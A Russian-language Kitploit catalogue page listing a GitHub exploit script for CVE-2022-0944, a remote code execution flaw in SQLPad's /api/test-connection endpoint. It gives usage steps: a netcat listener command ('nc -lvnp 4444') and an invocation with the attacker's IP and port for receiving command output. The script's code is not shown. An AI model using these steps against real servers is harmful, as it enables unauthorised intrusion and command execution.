Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sqlpad-rce-exploit-CVE-2022-0944 — Эксплойт-скрипт для CVE-2022-0944, позволяющий выполнить удаленный код на SQLPad через эндпоинт /api/test-connection. Поддерживает слепое выполнение кода (blind RCE) с прослушивателем netcat для вывода команд. | Kitploit
Инструменты/GitHubGitHub/0xroqeeb/sqlpad-rce-exploit-cve-2022-0944
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xroqeeb/sqlpad-rce-exploit-cve-2022-0944

sqlpad-rce-exploit-CVE-2022-0944

Эксплойт-скрипт для CVE-2022-0944, позволяющий выполнить удаленный код на SQLPad через эндпоинт /api/test-connection. Поддерживает слепое выполнение кода (blind RCE) с прослушивателем netcat для вывода команд.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
921 год назадЕщё не проверено

SQLPad RCE Exploit

Этот репозиторий содержит скрипт эксплуатации для CVE-2022-0944 в SQLPad — уязвимости, позволяющей удалённое выполнение кода (RCE) через конечную точку /api/test-connection.

Обзор

Предоставленный скрипт (exploit.py) демонстрирует, как использовать уязвимость RCE в SQLPad. Скрипт отправляет полезную нагрузку на уязвимую конечную точку, выполняя команду на целевом сервере.

Возможности

  • Слепое RCE: Выполняет команды на целевом сервере без получения прямых ответов.
  • Netcat Listener: Требуется настройка прослушивателя netcat на машине атакующего для получения результатов.

Предварительные требования

  • Python 3.x
  • Библиотека requests (можно установить через pip)

Использование

  1. Настройте Netcat Listener
root@kitploit:~
nc -lvnp 4444

Запустите эксплуатацию

root@kitploit:~
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>

Затронутые версии

  • До (исключая) 6.10.1

Ссылки

  • Huntr - CVE-2022-0944
  • NVD - CVE-2022-0944
Скачать инструмент